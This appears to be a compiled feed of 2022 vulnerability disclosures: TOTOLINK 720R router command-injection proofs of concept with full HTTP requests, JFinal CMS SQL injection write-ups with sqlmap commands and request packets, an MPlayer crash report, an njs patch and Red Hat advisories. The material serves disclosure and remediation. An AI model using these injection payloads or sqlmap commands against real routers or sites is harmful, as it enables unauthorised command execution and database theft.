TOTOLINK-720R v4.1.5cu.374 was discovered to contain a remote code execution (RCE) vulnerability via the setTracerouteCfg function.

**Exploit Title:**Totolink 720 has a code execution vulnerability  
**Version:**V4.1.5cu.374  
**Date:**2022/08/16  
**Exploit Author:**xiaohu816  
**Vendor Homepage:**https://www.totolink.net/

**POC:**  
After the administrator logs in, enter the "system tools" - > "route tracking" page to execute the command  
Execute TLS > / TMP / 2.txt

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 58
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/advance/traceroute.html?time=1659892330160
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: SESSION_ID=2:1591951611:2
    Connection: close
    
    {"command":"aaaa\tls>/tmp/2.txt","num":"4","topicurl":"setTracerouteCfg"} 
    

**Analysis Report:**  
In the processing function of setting the routing parameters of the router, the input IP address is simply checked and then written into V6 through sprintf, and then the system is called for execution  
  
You can bypass the check by \\ t to realize command injection

CVE-2022-38535: TOTOLINK-720R/totolink 720 RCode Execution2.md at 177ee39a5a8557a6bd19586731b0e624548b67ee · Jfox816/TOTOLINK-720R

TOTOLINK-720R v4.1.5cu.374 was discovered to contain a remote code execution (RCE) vulnerability via the setdiagnosicfg function.

**Exploit Title:**Totolink 720 has a code execution vulnerability  
**Version:**V4.1.5cu.374  
**Date:**2022/08/16  
**Exploit Author:**xiaohu816  
**Vendor Homepage:**https://www.totolink.net/

**POC:**  
After the administrator logs in, enter "system tools" - > "Ping diagnosis" page  
执行tls>/tmp/1.txt命令

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1  
    Content-Length: 52  
    Accept: application/json, text/javascript, */*; q=0.01  
    X-Requested-With: XMLHttpRequest  
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36  
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
    Origin: http://192.168.0.1  
    Referer: http://192.168.0.1/advance/diagnosis.html?time=1659889464870  
    Accept-Encoding: gzip, deflate  
    Accept-Language: en-US,en;q=0.9  
    Cookie: SESSION_ID=2:1591951611:2  
    Connection: close  
    
    {"ip":"aaaa\tls>/tmp/1.txt","num":"2","topicurl":"setDiagnosisCfg"}   
    

**Analysis Report:**  
In the setdiagnosicfg function, the value string corresponding to the IP in the JSON data is directly put into V6

  
Just write a string such as $(CMD) in the value corresponding to the IP to complete the command injection at CMD

CVE-2022-38534: TOTOLINK-720R/TOTOLINK 720 RCode Execution.md at fb6ba109ba9c5bd1b0d8e22c88ee14bdc4a75e6b · Jfox816/TOTOLINK-720R

Certain The MPlayer Project products are vulnerable to Out-of-bounds Read via function read_meta_record() of mplayer/libmpdemux/asfheader.c. This affects mplayer SVN-r38374-13.0.1 and mencoder SVN-r38374-13.0.1.

**#2393 closed defect (fixed)**

Reported by:

Owned by:

beastd

Priority:

normal

Component:

undetermined

Version:

HEAD

Severity:

major

Keywords:

Cc:

Blocked By:

Blocking:

Reproduced by developer:

no

Analyzed by developer:

no

Version: SVN-r38374-13.0.1  

Build command: ../configure --disable-ffmpeg\_a && make (compiling with asan)  

Summary of the bug: A out-of-bound read is found in fucnction read\_meta\_record() which affects mplayer and mencoder. The attached file can reproduce this issue And this vulnerability can cause the crash of mplayer.  

How to reproduce:  

1.Command: ./mplayer testcase  

2.Result:  

MPlayer SVN-r38374-9 (C) 2000-2022 MPlayer Team                                                                                                                                                                                                                           
Playing libavformat version 58.29.100 (external)                                                                                             
ASF file format detected.                                                                                                            
\[asfheader\] Video stream found, -vid 1                                                                                                                                                                                                                                                                                                                                                                         
MPlayer interrupted by signal 11 in module: demux\_open                                                                               
- MPlayer crashed by bad usage of CPU/FPU/RAM.                                                                                         
Recompile MPlayer with --enable-debug and make a 'gdb' backtrace and                                                                 
disassembly. Details in DOCS/HTML/en/bugreports\_what.html#bugreports\_crash.                                                        
- MPlayer crashed. This shouldn't happen.                                                                                              
It can be a bug in the MPlayer code \_or\_ in your drivers \_or\_ in your                                                                
gcc version. If you think it's MPlayer's fault, please read                                                                          
DOCS/HTML/en/bugreports.html and follow the instructions there. We can't and                                                         
won't help unless you provide this information when reporting a possible bug.

3.After debugging with gdb, I found the crash is caused by access to a piece of unmmaped memory:  

Program received signal SIGSEGV, Segmentation fault.
read\_meta\_record (buf\_len=<synthetic pointer>, buf=0x55bc7b4c52a2 <error: Cannot access memory at address 0x55bc7b4c52a2>, dest=<synthetic pointer>) at libmpdemux/asfheader.c:242
242       dest->lang\_list\_index = AV\_RL16(buf);
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────────────────────\[ REGISTERS \]────────────────────────────────────────────────────────────
 RAX  0x9e000004
 RBX  0x55bbdd4c529e ◂— 0x1000000000001                                                                                                                                                                                                                                                                                                                                                RCX  0x1
 RDX  0x1a
 RDI  0x55bbdd4c5284 ◂— 0xfda811cf5b4df869                                                                                                                                                                                                                                                                                                                                             RSI  0x1a                                                                                                                                                                                                                                                                                                                                                                             R8   0x0
 R9   0x10                                                                                                                                                                                                                                                                                                                                                                             R10  0x0
 R11  0x1ce
 R12  0x55bc7b4c52a2
 R13  0x0
 R14  0x55bbdd4c51d0 ◂— 0x11cfa9478cabdca1
 R15  0x1e1
 RBP  0x62000103
 RSP  0x7fff0e88d9f0 —▸ 0x7fff0e88da00 ◂— 0x55bb000001ce
 RIP  0x55bbdb4dde47 (read\_asf\_header+2935) ◂— movzx  edx, word ptr \[r12 + 4\]
─────────────────────────────────────────────────────────────\[ DISASM \]──────────────────────────────────────────────────────────────
 ► 0x55bbdb4dde47 <read\_asf\_header+2935>    movzx  edx, word ptr \[r12 + 4\]
   0x55bbdb4dde4d <read\_asf\_header+2941>    movzx  r9d, word ptr \[r12\]
   0x55bbdb4dde52 <read\_asf\_header+2946>    movzx  ecx, word ptr \[r12 + 2\]
   0x55bbdb4dde58 <read\_asf\_header+2952>    mov    eax, dword ptr \[r12 + 8\]
   0x55bbdb4dde5d <read\_asf\_header+2957>    mov    esi, edx
   0x55bbdb4dde5f <read\_asf\_header+2959>    lea    rdi, \[r12 + 0xc\]
   0x55bbdb4dde64 <read\_asf\_header+2964>    sub    ebp, edx
   0x55bbdb4dde66 <read\_asf\_header+2966>    js     read\_asf\_header+3128 <read\_asf\_header+3128>
    ↓
   0x55bbdb4ddf08 <read\_asf\_header+3128>    mov    ebx, dword ptr \[rsp + 0x44\]
   0x55bbdb4ddf0c <read\_asf\_header+3132>    mov    rax, qword ptr \[rsp + 0x18\]
   0x55bbdb4ddf11 <read\_asf\_header+3137>    mov    rdi, qword ptr \[rsp + 0x20\]
──────────────────────────────────────────────────────────\[ SOURCE (CODE) \]──────────────────────────────────────────────────────────
In file: /home/jlx/good\_mplayer/mplayer/libmpdemux/asfheader.c
   237 #define CHECKDEC(l, n) if (((l) -= (n)) < 0) return 0
   238 static char\* read\_meta\_record(ASF\_meta\_record\_t\* dest, char\* buf,
   239     int\* buf\_len)
   240 {
   241   CHECKDEC(\*buf\_len, 2 + 2 + 2 + 2 + 4);
 ► 242   dest->lang\_list\_index = AV\_RL16(buf);
   243   dest->stream\_num = AV\_RL16(&buf\[2\]);
   244   dest->name\_length = AV\_RL16(&buf\[4\]);
   245   dest->data\_type = AV\_RL16(&buf\[6\]);
   246   dest->data\_length = AV\_RL32(&buf\[8\]);
   247   buf += 2 + 2 + 2 + 2 + 4;
──────────────────────────────────────────────────────────────\[ STACK \]──────────────────────────────────────────────────────────────
00:0000│ rsp  0x7fff0e88d9f0 —▸ 0x7fff0e88da00 ◂— 0x55bb000001ce
01:0008│      0x7fff0e88d9f8 ◂— 0xfb775cd5000001e1
02:0010│      0x7fff0e88da00 ◂— 0x55bb000001ce
03:0018│      0x7fff0e88da08 —▸ 0x55bbdd4c50f0 ◂— 0x11cf668e75b22630
04:0020│      0x7fff0e88da10 —▸ 0x55bbdd4c53c0 —▸ 0x55bbdd461400 ◂— 0x0
05:0028│      0x7fff0e88da18 —▸ 0x55bbdd4c37a0 —▸ 0x55bbdb712ce0 (demuxer\_desc\_asf) —▸ 0x55bbdb6b3e9e ◂— 'ASF demuxer'
06:0030│      0x7fff0e88da20 ◂— 0x1
07:0038│      0x7fff0e88da28 ◂— 0x55bb00000001
────────────────────────────────────────────────────────────\[ BACKTRACE \]────────────────────────────────────────────────────────────
 ► f 0     55bbdb4dde47 read\_asf\_header+2935
   f 1     55bbdb4dde47 read\_asf\_header+2935
   f 2     55bbdb4dde47 read\_asf\_header+2935
   f 3     55bbdb4e9059 demux\_open\_asf+57
   f 4     55bbdb4e58f3 demux\_open\_stream+931
   f 5     55bbdb4e63e1 demux\_open+753
   f 6     55bbdb414dcb main+4027
   f 7     7f15770a80b3 \_\_libc\_start\_main+243
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> p buf
$2 = 0x55bc7b4c52a2 <error: Cannot access memory at address 0x55bc7b4c52a2>

CVE-2022-38851: #2393 (Out-of-bound read in function read_meta_record() of mplayer/libmpdemux/asfheader.c) – MPlayer

JFinal CMS 5.1.0 is vulnerable to SQL Injection.

Permalink

Cannot retrieve contributors at this time

**POC**

First of all you should install sqlmap

you need set

*   target domain or IP
*   your cookie

the run the shell

    sqlmap -u http://targetDomainOrIP/jfinal_cms/jfinal_cms/admin/contact/list  --thread 8 --batch --smart  --random-agent --data "
    form.orderColumn=*&form.orderAsc=&attr.name=%E4%B8%89&totalRecords=2&pageNo=1&pageSize=20&length=10"  --cookie "  your cookie  " --current-db
    

Sometimes you should know that the /jfinal\_cms/ is not necessary ,you need juede the route

**principle**

you can see the code of interface /system/menu/list

    sql.append(" order by ").append(orderBy);
    

There is a sql statement directly spliced

what is more

There is no measure to prevent sql injection because sql injection is required here

**solution**

By analyzing this function point, I found that the injection of orderby is fixed, such as id, name, menu key, so you can try to use parameterized query or make a whitelist

**What is more**

my test

    POST /jfinal_cms/admin/contact/list HTTP/1.1
    Host: 172.30.48.1
    Content-Length: 98
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://172.30.48.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://172.30.48.1/jfinal_cms/admin/contact/list
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=BF13B42EDFC3DEC180959D6DF143BD18; Hm_lvt_1040d081eea13b44d84a4af639640d51=1659122360; session_user="wgPmpe3hEuJWIL+I+kHtxqag1wutWsMhm6eaAgoJH0c="
    Connection: close
    
    form.orderColumn=*&form.orderAsc=&attr.name=%E4%B8%89&totalRecords=2&pageNo=1&pageSize=20&length=10
    

run it in sqlmap！！！ use -r

CVE-2022-37201: someEXP_of_jfinal_cms/sql4.md at main · AgainstTheLight/someEXP_of_jfinal_cms

Prototype pollution vulnerability in stealjs steal 2.2.4 via the optionName variable in main.js.

CVE-2022-37264: steal/main.js at c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9 · stealjs/steal

Nginx NJS v0.7.7 was discovered to contain a segmentation violation via njs_utf8_next at src/njs_utf8.h

**Demo patch**

diff --git a/src/njs\_string.c b/src/njs\_string.c
index 83cede5..8b3a31e 100644
\--- a/src/njs\_string.c
+++ b/src/njs\_string.c
@@ -2307,7 +2307,10 @@ njs\_string\_prototype\_last\_index\_of(njs\_vm\_t \*vm, njs\_value\_t \*args,
         }
 
         p = njs\_string\_offset(string.start, end, index);
\-
+        if (p == (u\_char\*)NJS\_ERROR) {
+            njs\_error(vm, "index too large");
+            return NJS\_ERROR;
+        }
         for (; p >= string.start; p = njs\_utf8\_prev(p)) {
             if ((p + s.size) <= end && memcmp(p, s.start, s.size) == 0) {
                 goto done;
@@ -2530,14 +2533,16 @@ njs\_string\_offset(const u\_char \*start, const u\_char \*end, size\_t index)
 {
     uint32\_t    \*map;
     njs\_uint\_t  skip;
\-
+    njs\_uint\_t  size = 0;
     if (index >= NJS\_STRING\_MAP\_STRIDE) {
         map = njs\_string\_map\_start(end);
 
         if (map\[0\] == 0) {
\-            njs\_string\_offset\_map\_init(start, end - start);
+            size = njs\_string\_offset\_map\_init(start, end - start);
+        }
+        if((index / NJS\_STRING\_MAP\_STRIDE) > size){
+            return (u\_char\*)NJS\_ERROR;
         }
\-
         start += map\[index / NJS\_STRING\_MAP\_STRIDE - 1\];
     }
 
@@ -2596,7 +2601,7 @@ njs\_string\_index(njs\_string\_prop\_t \*string, uint32\_t offset)
 }
 
 
\-void
+njs\_uint\_t
 njs\_string\_offset\_map\_init(const u\_char \*start, size\_t size)
 {
     size\_t        offset;
@@ -2622,6 +2627,8 @@ njs\_string\_offset\_map\_init(const u\_char \*start, size\_t size)
         offset--;
 
     } while (p < end);
+
+    return n;
 }
 
 
diff --git a/src/njs\_string.h b/src/njs\_string.h
index 99f9d14..7e5eaab 100644
\--- a/src/njs\_string.h
+++ b/src/njs\_string.h
@@ -244,7 +244,7 @@ njs\_int\_t njs\_string\_slice(njs\_vm\_t \*vm, njs\_value\_t \*dst,
 const u\_char \*njs\_string\_offset(const u\_char \*start, const u\_char \*end,
     size\_t index);
 uint32\_t njs\_string\_index(njs\_string\_prop\_t \*string, uint32\_t offset);
\-void njs\_string\_offset\_map\_init(const u\_char \*start, size\_t size);
+njs\_uint\_t njs\_string\_offset\_map\_init(const u\_char \*start, size\_t size);
 double njs\_string\_to\_index(const njs\_value\_t \*value);
 const char \*njs\_string\_to\_c\_string(njs\_vm\_t \*vm, njs\_value\_t \*value);
 njs\_int\_t njs\_string\_encode\_uri(njs\_vm\_t \*vm, njs\_value\_t \*args,

This fix is not standard, I just provides an idea.

CVE-2022-38890: Another way to trigger SEGV in njs_utf8_next cause oob read · Issue #569 · nginx/njs

A Regular Expression Denial of Service (ReDoS) flaw was found in stealjs steal 2.2.4 via the source and sourceWithComments variable in main.js.

CVE-2022-37262: steal/main.js at c9dd1eb19ed3f97aeb93cf9dcea5d68ad5d0ced9 · stealjs/steal

JFinal CMS 5.1.0 is affected by: SQL Injection. These interfaces do not use the same component, nor do they have filters, but each uses its own SQL concatenation method, resulting in SQL injection

**POC**

First of all you should install sqlmap

you need set

*   target domain or IP
*   your cookie

the run the shell

    sqlmap -u http://targetDomainOrIP/jfinal_cms/system/config/list  --thread 8 --batch --smart  --random-agent --data "oper_type=1&form.orderColumn=*&form.orderAsc=asc&attr.name=&attr.key=&attr.type=-1&totalRecords=16&pageNo=1&pageSize=20&length=10"  --cookie "  your cookie  " --current-db
    

Sometimes you should know that the /jfinal\_cms/ is not necessary ,you need juede the route

**principle**

you can see the code of interface /system/menu/list

    sql.append(" order by ").append(orderBy);
    

There is a sql statement directly spliced

what is more

There is no measure to prevent sql injection because sql injection is required here

**solution**

By analyzing this function point, I found that the injection of orderby is fixed, such as id, name, menu key, so you can try to use parameterized query or make a whitelist

**PACKET**

    POST /jfinal_cms/system/config/list HTTP/1.1
    Host: 172.30.48.1
    Content-Length: 131
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://172.30.48.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://172.30.48.1/jfinal_cms/system/config/list
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: JSESSIONID=BF13B42EDFC3DEC180959D6DF143BD18; session_user="wgPmpe3hEuJWIL+I+kHtxqag1wutWsMhm6eaAgoJH0c="; Hm_lvt_1040d081eea13b44d84a4af639640d51=1659122360,1659131581; Hm_lpvt_1040d081eea13b44d84a4af639640d51=1659131581
    Connection: close
    
    oper_type=1&form.orderColumn=*&form.orderAsc=asc&attr.name=&attr.key=&attr.type=-1&totalRecords=16&pageNo=1&pageSize=20&length=10

CVE-2022-37207: someEXP_of_jfinal_cms/sql10.md at main · AgainstTheLight/someEXP_of_jfinal_cms

Red Hat Security Advisory 2022-6542-01 - PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. Issues addressed include file overwrite and traversal vulnerabilities.

Red Hat Security Advisory 2022-6542-01

Red Hat Security Advisory 2022-6527-01 - OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform. This advisory contains OpenShift Virtualization 4.11.0 RPMs.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Virtualization 4.11.0 RPMs security and bug fix update  
Advisory ID:       RHSA-2022:6527-02  
Product:           cnv  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6527  
Issue date:        2022-09-14  
CVE Names:         CVE-2022-27191  
====================================================================  
1. Summary:

Red Hat OpenShift Virtualization release 4.11.0 is now available with  
updates to packages and images that fix several bugs and add enhancements.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

CNV 4.11 for RHEL 7 - x86_64  
CNV 4.11 for RHEL 8 - x86_64

3. Description:

OpenShift Virtualization is Red Hat's virtualization solution designed for  
Red Hat OpenShift Container Platform.

This advisory contains OpenShift Virtualization 4.11.0 RPMs.

Security Fix(es):

* golang: crash in a golang.org/x/crypto/ssh server (CVE-2022-27191)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2051902 - 4.11.0 rpms  
2064702 - CVE-2022-27191 golang: crash in a golang.org/x/crypto/ssh server

6. Package List:

CNV 4.11 for RHEL 7:

Source:  
kubevirt-4.11.0-643.el7.src.rpm

x86_64:  
kubevirt-virtctl-4.11.0-643.el7.x86_64.rpm  
kubevirt-virtctl-redistributable-4.11.0-643.el7.x86_64.rpm

CNV 4.11 for RHEL 8:

Source:  
kubevirt-4.11.0-643.el8.src.rpm

x86_64:  
kubevirt-virtctl-4.11.0-643.el8.x86_64.rpm  
kubevirt-virtctl-redistributable-4.11.0-643.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-27191  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYyMkzNzjgjWX9erEAQgG4RAAk4MHNM7335XuHsojYC7QkxUaHTkdHiLN  
kziuszf4kXR14nWZVCAdisOrTPMpl9m99WGsVvYdmwGkbJLQws+eSNDjrz3n81x+  
sy+XJxKNKAUBejsbgoCeYDCUSe9M2ItUSkw6CNty3yEAgdAonC8RXOdiMly/0RzE  
OQpoA2sLENF+Bp8UUx82tv84uNae25cc3mx40qTtrJ6EFRBjB3V4H00yi4SAGcan  
Hf+ebQnpw3dfwRgQ3aRjD80Q5EMKPZeEF5CxfnJcMCKmuVt1tPEyQ/Zxgs9/rqQV  
Gn2IKn6+yA1uC5h+968yb8TrVJtctThstWmkEds7TAKxIMZVszRXi7uaUjG/w0FZ  
QPAjzm/zSIkl3v2J2Vz3k1/FXPpAMoqUvm7yFBft9AonfJkz3l5+HUydpxL/K6iO  
PuTK1oJeblZ80lA7TnrnFl4h8P81VWRhmuF1Gjw2cr1W21c2g+7In7YduXzxem60  
6RGuay+cjdWmorHIPQEGShE5s6XXMfgtqEUiudSNH0EpKOO7WN46egNUMdWNJOIi  
Lb9BsINQVJW9YzSICbFc0HyNHLWAkD5PIQhvRgC3amvczMUnhwD4Touteas7Caf4  
UEbPwIa2iFFiQ9B83kYwQEUVpNDfuOBhYsig8FtO3lO16o4NlIEbvPXhnG41kxFA  
TxAIVSVrto0=nuEE  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Tag

#js